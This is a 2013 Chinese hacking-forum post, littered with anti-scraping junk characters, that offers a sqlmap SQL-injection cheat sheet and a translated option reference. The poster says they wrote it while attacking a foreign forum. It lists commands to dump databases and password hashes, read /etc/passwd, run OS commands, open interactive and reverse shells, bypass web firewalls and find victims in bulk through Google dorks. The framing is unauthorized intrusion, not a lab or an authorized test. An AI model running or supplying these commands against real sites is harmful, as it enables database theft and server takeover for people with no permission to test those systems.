找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2800|回复: 0
打印 上一主题 下一主题

sqlmap注入命令的使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:26:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、& G, H, E, J$ l" W, n. T
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称( y- A5 C+ |& T8 q- O# O- k
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名1 I  B/ s4 M' R$ r# _8 R
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
# ^; I% i) @, W& x0 O 8 x$ b+ A- x1 g. ~( S- a* E4 b
sqlmap  -u  “http://url/news?id=1″  –dump  -C  “column_name”  -T “table_name”-D “db_name”-v5 h- o3 p0 v( i2 V9 b( d7 s
0 #获取字段内容. n2 B" o9 n" U  z

& Q/ Z' J0 `" r4 @/ @; g******************信息获取******************' M# ?9 s( G; o6 X% |: w+ P( \
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型/ n2 k+ v# Y' J2 r8 A
sqlmap -u “http://url/news?id=1″ –users #列数据库用户7 q% _; W- D1 X! M% k: e
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
! V5 s; e* b  j1 H' h0 tsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码3 s) e4 z# `$ R7 W5 p1 Z
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码5 H% t2 j  k4 B& }9 `, z. |/ t
sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”
7 u' C" B+ d3 t+ R* K, F/ }–start 1 –stop 20 #列出指定字段,列出20 条+ E. W7 z9 M2 {+ ]3 j2 F7 Z  \* G# X
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表8 @- Q/ D- l# s/ ?' ]" e; F: s) |# M
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
$ f# _# P6 i3 Q. x6 h6 X! ~sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色5 b4 y3 j& E; }7 b6 c  i! W" I
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)2 u) k4 f7 i% R% h, U* m$ M/ a
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
% A! V1 f* K6 |+ x9 _sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录, d3 L5 N) }. x
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
; j+ Y* G- F6 W. D. V- G. Ssqlmap -u “http://url/news?id=1″-b #获取banner信息
9 C& o) ~4 o  J7 Bsqlmap -u “http://url/news?id=1″ –data “id=3″#post注入* |$ j% M2 n3 P8 ~$ g
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
" y3 ~' V& ]' S, H1 tsqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
; A+ \! x3 j' N% \sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词8 g& D4 o+ y: B; o8 T$ `  P; H0 _& E
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令' N, E1 M- D$ s( s0 v$ X
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
( A$ s9 {! |1 u% Q1 k, k) s9 xsqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令5 k$ `) y9 i- O* Z8 |  s" Z
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
' j2 v4 f, e/ Q: z9 rsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
0 n0 B3 i! j0 D5 Nsqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度8 |) t0 ~  S" Q/ Q# x4 [; R. \
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度' M2 W( `. s5 H& h' [! V
***********高级用法*************3 j1 M5 B' o* d
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
% k+ p+ {2 I) K  M9 R+ ^sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问
% `  }& n8 E8 c. E–technique   测试指定注入类型\使用的技术5 L2 ~- @9 ]! t1 f$ ^9 O5 S
不加参数默认测试所有注入技术
" w$ }/ X- D) B- q•     B: 基于布尔的SQL 盲注+ m- e: s) l5 l) W+ ?
•     E: 基于显错sql 注入
3 t+ f) j  w  s; P; T5 p•     U: 基于UNION 注入9 W, w! p, s) q4 D$ A. G! z- n$ J7 T
•     S: 叠层sql 注入- E6 `; n: Y0 T% z5 U
•     T: 基于时间盲注
5 d$ n1 o# L; K: I–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
/ b) b- }! O1 }: H–tamper 插件所在目录) |2 i4 L5 h& x  x; j
\sqlmap-dev\tamper! K6 T5 @, O' o- n7 N+ s3 ]
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
1 }* z5 U. x3 w. v, T" Clevel 执行测试等级 攻击实例:% o6 o/ i: K$ [5 [
Sqlmap -u “http://url/news?id=1&Submit=Submit”
5 Q2 l9 f; w2 t# P2 v8 V–cookie=”PHPSESSID=41aa833e6d0d
4 I% z1 w; Y& m# B2 \$ [28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user  f5 v$ ?. p9 g2 U5 H8 b4 q
–password
: A6 |* X( J8 u( Y4 v. H参考文档:http://sqlmap.sourceforge.net/doc/README.html
- J- {0 m) \# q6 g. b, E/ ^5 g***********安装最新版本*************, k& v5 ?+ b% ]3 @* T% E4 [& `
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
7 x1 u! d9 m, C9 d/ ?; A+ Bsudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev) v# j# @& i* U, s9 p
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件, Y+ \, i& Z% O
sudo vim /home/当前用户/.bashrc
5 t! Z  I# Y1 O#任意位置加上:
$ @' w: j1 b  o; b$ `; K1 w% w! Zalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效& L! ~/ [) y( \, V2 _% D
如果想对所有用户有效 可设置全局 编辑下面的文件
/ g4 B0 w" N- S& Y; Tvim /etc/profile
% {$ {! Q# D3 \1 B; A0 ^  L8 s同样加上:
1 @* a, y0 Z) H, o( e/ ialias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
+ K7 ^) y9 m3 P+ k) b******************windows 7 (x64) sqlmap install (SVN)************3 S7 ~3 V6 T% E6 \7 L
http://www.python.org/getit/ 安装python+ B7 F2 i7 j0 c
http://www.sliksvn.com/en/download 安装windows svn client
) A% G* g9 R4 T9 b0 f/ Csvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev3 r1 ]- ]8 |4 {' u! W$ U
安装sqlmap
& P) q5 H4 V" K" |+ J; w% e*修改环境变量
" J" B3 T. x- ], [7 q; T" a–version             显示程序的版本号并退出8 |; J" E7 P/ e+ q, }2 n
-h, –help            显示此帮助消息并退出+ O6 l: Z. x. R" p& l9 q# t; F
-v VERBOSE            详细级别:0-6(默认为1)
, m$ v2 ]0 i1 Y& KTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。
1 H% W" `) O4 }4 N) B-d DIRECT           直接连接到数据库。
- h  b- F8 M2 K1 a-u URL, –url=URL   目标URL。
3 I" Q8 }) m( M, o$ }" i8 x-l LIST             从Burp 或WebScarab 代理的日志中解析目标。( c5 T4 S, o/ _# i2 Q1 p& Y/ R; `
-r REQUESTFILE      从一个文件中载入HTTP 请求。: t1 @5 I2 s, F( a! d9 \5 Q
-g GOOGLEDORK       处理Google dork 的结果作为目标URL。, G9 B' d. |) V
-c CONFIGFILE       从INI 配置文件中加载选项。4 N& {2 c9 \* e( E
Request(请求)::
. q  v, y' _2 a# l3 B这些选项可以用来指定如何连接到目标URL。4 F8 G! u" ?1 E# [- ], S' _
–data=DATA         通过POST 发送的数据字符串5 Y* z4 ?( E1 d8 s
–cookie=COOKIE     HTTP Cookie 头
% Y0 r3 O( ~) L: X# E–cookie-urlencode  URL 编码生成的cookie 注入  V: M7 o) R" P6 h1 y
–drop-set-cookie   忽略响应的Set –Cookie 头信息  H' ]( ?* m2 T, J

6 U- K. a" k4 @1 M3 e. |) J( L–user-agent=AGENT  指定  HTTP User –Agent 头% R  \+ r. n8 Z
–random-agent      使用随机选定的HTTP User –Agent 头! r4 G- o8 d( r5 t3 O
–referer=REFERER   指定  HTTP Referer 头
8 X3 ~8 L: D5 T7 Y6 |7 ?–headers=HEADERS   换行分开,加入其他的HTTP 头& @6 b, A2 @0 J1 [; M$ p
–auth-type=ATYPE   HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
/ o& R9 `0 R7 _/ d' J–auth-cred=ACRED   HTTP 身份验证凭据(用户名:密码)
7 q" z1 \0 D: ^1 b3 x  G+ i, G' ?–auth-cert=ACERT   HTTP 认证证书(key_file,cert_file)
  g/ Y  v( i% I; J( b% f–proxy=PROXY       使用HTTP 代理连接到目标URL, v6 S; ?$ t7 ~- V7 l9 a+ D" X
–proxy-cred=PCRED  HTTP 代理身份验证凭据(用户名:密码), w' p0 S6 k7 a/ ~. n4 {
–ignore-proxy      忽略系统默认的HTTP 代理5 O) V  G  @) j
–delay=DELAY       在每个HTTP 请求之间的延迟时间,单位为秒
! F9 Z6 _7 g4 j. `6 S" t: }–timeout=TIMEOUT   等待连接超时的时间(默认为30 秒)
3 L& O$ l7 e* e6 g–retries=RETRIES   连接超时后重新连接的时间(默认3)
. B. Z% |+ {  e1 t: w0 h* d: o5 G–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式: `/ {3 r4 a8 W  ?$ X
–safe-url=SAFURL   在测试过程中经常访问的url 地址, j* \; c' F' @, U, ~4 t  w: V- D' _
–safe-freq=SAFREQ  两次访问之间测试请求,给出安全的URL* H7 ^' h8 W5 d
Optimization(优化): 这些选项可用于优化SqlMap 的性能。* b; \! B; O- s% }6 I
-o                  开启所有优化开关
4 I, L& f: O( q( Q–predict-output    预测常见的查询输出
6 @3 B# @& x' ^# Y% A7 y7 u  z–keep-alive        使用持久的HTTP(S)连接( x6 y7 N( J- b- R
–null-connection   从没有实际的HTTP 响应体中检索页面长度: y& m" u" `; Q' D0 b5 e
–threads=THREADS   最大的HTTP(S)请求并发量(默认为1)+ R! H. }, Q2 K. G2 }) j/ t
Injection(注入):
( ^0 @: N2 r5 J$ }这些选项可以用来指定测试哪些参数,  提供自定义的注入payloads 和可选篡改脚本。
: K, F# z$ k3 v- V' S- y: g8 @! p-p TESTPARAMETER    可测试的参数(S)' `1 Z" K1 K1 v/ R  p; [
–dbms=DBMS         强制后端的DBMS 为此值
9 t6 M: x1 ]; t–os=OS             强制后端的DBMS 操作系统为这个值1 _8 _* R! w1 X( l, o. v
–prefix=PREFIX     注入payload 字符串前缀
# ~! t( q/ Z' U7 h& @8 x% N& _–suffix=SUFFIX     注入 payload 字符串后缀
! f7 I' f1 |2 s, j  ^3 o2 K% \–tamper=TAMPER     使用给定的脚本(S)篡改注入数据# V# r# }: n$ T
Detection(检测):" l, v' u# U" x( D2 `9 T
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。" q. }* j" E  O$ z9 v9 f4 i
–level=LEVEL       执行测试的等级(1-5,默认为1)
  Z5 F8 F* F: c5 Y; Q) W' `–risk=RISK         执行测试的风险(0-3,默认为1)
, O  P: [2 m! b5 `2 Y1 N–string=STRING     查询时有效时在页面匹配字符串+ a  u9 B2 ^% h8 q) Y
–regexp=REGEXP     查询时有效时在页面匹配正则表达式# D' v1 U, q; w. k- \
–text-only         仅基于在文本内容比较网页+ u9 Z! g* b3 k& c4 C9 r
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。3 `2 c) Z9 d6 E0 G/ l
–technique=TECH    SQL 注入技术测试(默认BEUST)3 i3 c( b( K! Q
–time-sec=TIMESEC  DBMS 响应的延迟时间(默认为5 秒)
: a# l& p- W' m–union-cols=UCOLS  定列范围用于测试UNION 查询注入; F1 v1 `0 b* |) h2 |; e% ]) i
–union-char=UCHAR  用于暴力猜解列数的字符
3 C$ j9 @3 ?6 v: p0 Z+ D! zFingerprint(指纹):
: w0 M: W( C1 \  X# S, ^-f, –fingerprint     执行检查广泛的DBMS 版本指纹
1 l* ]% r9 O3 m7 b( r  mEnumeration(枚举):% a: W& H3 W% W3 y( d2 D
+ N, ^3 @) k- V
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
& |" w0 v. O" k. I, }-b, –banner        检索数据库管理系统的标识. r% `  h# C8 p. c/ p
–current-user      检索数据库管理系统当前用户$ m9 P# X# r5 y7 b8 V+ l3 ~$ w
–current-db        检索数据库管理系统当前数据库
8 T  ^( ]" M$ M' {9 A–is-dba            检测DBMS 当前用户是否DBA8 h+ ]: j" g& j3 k. J
–users             枚举数据库管理系统用户# h2 \; h( A5 E, v) c5 e
–passwords         枚举数据库管理系统用户密码哈希
# w! P( @! r& |( T2 v! G–privileges        枚举数据库管理系统用户的权限
6 K8 K& ?: r/ T( K( ~–roles             枚举数据库管理系统用户的角色
. m  ^' E+ d" \! W  V7 Z8 m–dbs               枚举数据库管理系统数据库: {4 y3 H: x8 f
–tables            枚举的DBMS 数据库中的表; H+ U! T% o* [) z) f' A4 p
–columns           枚举DBMS 数据库表列" p, o( y1 F: ~4 @# O6 `, {: h
–dump              转储数据库管理系统的数据库中的表项0 ?2 ^3 d4 V# n* z2 Q' s+ |* i; `1 L
–dump-all          转储所有的DBMS 数据库表中的条目
: |7 a! N) ]7 c& ~6 q$ ]–search            搜索列(S),表(S)和/或数据库名称(S)
' W- h4 v% Z9 b9 `) [-D DB               要进行枚举的数据库名
+ B# Q+ u5 c+ y6 h" p( j3 t-T TBL              要进行枚举的数据库表: ?2 P* k2 P& M/ m
-C COL              要进行枚举的数据库列
& t5 K2 m/ e' b. [" d-U USER             用来进行枚举的数据库用户
& L9 [5 g4 F# N0 K- U( E! k–exclude-sysdbs    枚举表时排除系统数据库
6 L0 @* ~' n' N–start=LIMITSTART  第一个查询输出进入检索
* T: d' a6 Q$ p2 D0 Q–stop=LIMITSTOP    最后查询的输出进入检索
& x: M3 f' F* q  `, W* e! c) w–first=FIRSTCHAR   第一个查询输出字的字符检索
( r% X; r, s- T7 h–last=LASTCHAR     最后查询的输出字字符检索' R/ y$ q. P4 V, b& L/ C
–sql-query=QUERY   要执行的SQL 语句
+ S" B4 x, k$ m; w+ z–sql-shell         提示交互式SQL 的shell, ]/ c' R$ t& L, q# J7 i0 J
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
: P6 Y# k+ w7 Q; w–common-tables     检查存在共同表
5 `1 U( x- n8 d. v, N–common-columns    检查存在共同列
- \& ^% Z" }, M, U- hUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
% o: \; c  w( l6 s3 O/ D# n6 z–udf-inject        注入用户自定义函数
# q: h* d5 |. l; ?–shared-lib=SHLIB  共享库的本地路径) [2 [7 M  l8 u0 z$ F
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。9 a) s/ m7 v/ k$ M
–file-read=RFILE   从后端的数据库管理系统文件系统读取文件
4 R$ j. \& }3 |) }7 F9 T–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件
! @. {  l% U7 v' Q5 q* b) u, i–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径, E, M5 T" b8 `  y3 P& r8 u/ B4 S
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
4 |7 _8 J2 D# N( M+ b! [–os-cmd=OSCMD      执行操作系统命令5 P/ l% j% B, c1 }
–os-shell          交互式的操作系统的shell
( B2 s, S/ p- R–os-pwn            获取一个OOB shell,meterpreter 或VNC
( s3 E$ f7 U$ k–os-smbrelay       一键获取一个OOB shell,meterpreter 或VNC) u0 `: l9 O8 Y- N9 ^% ?% w2 t
–os-bof            存储过程缓冲区溢出利用$ K, m# {7 U3 I
–priv-esc          数据库进程用户权限提升2 n$ V) P  m7 B5 @, {
–msf-path=MSFPATH  Metasploit Framework 本地的安装路径9 T3 \' W; {8 \! P2 V* r( L2 l
–tmp-path=TMPPATH  远程临时文件目录的绝对路径% Y$ _& E( z, y) a  J7 J. _
$ p) a1 m/ _6 Y. {9 A% f' U& s
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。# R( X& U/ _$ U$ n1 s5 p
–reg-read          读一个Windows 注册表项值
7 J3 G& r0 \* y( o7 `! T# W: H' c% O–reg-add           写一个Windows 注册表项值数据
- @; B5 X) J) w8 n% @) [–reg-del           删除Windows 注册表键值
5 L) E  z+ V; Q3 k$ I" |( c–reg-key=REGKEY    Windows 注册表键/ m) t* I( N+ b) }  d; |! b) N
–reg-value=REGVAL  Windows 注册表项值& A  M1 g7 q! I! a1 q6 j: |; ^
–reg-data=REGDATA  Windows 注册表键值数据$ h1 n' O% j9 a1 c4 E2 t
–reg-type=REGTYPE  Windows 注册表项值类型
* @5 m9 F$ N4 \/ T8 A2 T. LGeneral(一般): 这些选项可以用来设置一些一般的工作参数。1 x. @: _* ?. X% Q; E$ z
-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中0 I; p8 ^0 N# T4 t3 {
-s SESSIONFILE      保存和恢复检索会话文件的所有数据8 F5 B) c! U4 \+ p, {' N2 G
–flush-session     刷新当前目标的会话文件
  p( P- \. V5 F–fresh-queries     忽略在会话文件中存储的查询结果
" _' c1 A; z+ ~8 t& \–eta               显示每个输出的预计到达时间% Z* N; j3 |4 l7 r0 x6 D4 ]
–update            更新SqlMap
' Y7 a$ \1 {" a–save              file 保存选项到INI 配置文件
4 C4 J/ S9 T$ q# P6 l, v0 q. D–batch             从不询问用户输入,使用所有默认配置。
, Q- w$ Y% M# `7 T% bMiscellaneous(杂项):
/ l9 k9 v- p! \( J( g' M–beep              发现SQL 注入时提醒
+ ?; w7 J' C9 g–check-payload     IDS 对注入payloads 的检测测试8 ]* t/ u  e0 a! R: d
–cleanup           SqlMap 具体的UDF 和表清理DBMS: v  M' p2 U# ?: A5 `4 R6 D% C; Z
–forms             对目标URL 的解析和测试形式4 O. V* k$ D$ ~
–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果
1 ~7 c) U1 a! G! T3 L- x/ |# V( V3 b–page-rank         Google dork 结果显示网页排名(PR)8 Q7 _; l) B, {: {) i! f0 R6 Y- m
–parse-errors      从响应页面解析数据库管理系统的错误消息
1 k1 V5 P! C2 D4 `–replicate         复制转储的数据到一个sqlite3 数据库: ^& x2 R" p1 o  e3 R2 P4 y! D9 p
–tor               使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
0 ?' X+ e( Q) p" r1 m9 B–wizard            给初级用户的简单向导界面
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表